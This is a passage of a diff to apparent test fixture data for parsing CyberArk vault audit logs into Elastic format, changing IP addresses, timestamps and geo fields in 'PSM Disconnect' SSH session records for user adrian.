System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813723Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -228,20 +219,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -265,7 +247,7 @@ }, "@timestamp": "2021-03-11T17:47:01.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -277,15 +259,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:47:01Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -298,21 +280,21 @@ "psmid": "PSMServer", "session_id": "ba22b012-8291-11eb-b981-080027efd402", "src_host": "127.0.0.1", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:11" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:47:01", "desc": "PSM Disconnect" @@ -324,8 +306,8 @@ "event": { "severity": 2, "duration": 11000000000, - "ingested": "2021-06-09T10:24:31.624798Z", - "original": "\u003c5\u003e1 2021-03-11T17:47:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:47:01\",\"IsoTimestamp\":\"2021-03-11T17:47:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813728600Z", + "original": "\u003c5\u003e1 2021-03-11T17:47:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:47:01\",\"IsoTimestamp\":\"2021-03-11T17:47:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -348,20 +330,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -385,7 +358,7 @@ }, "@timestamp": "2021-03-11T17:48:40.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -397,15 +370,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:48:40Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -418,21 +391,21 @@ "psmid": "PSMServer", "session_id": "f6acbf00-8291-11eb-b9ba-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:48:40", "desc": "PSM Disconnect" @@ -444,8 +417,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624801600Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 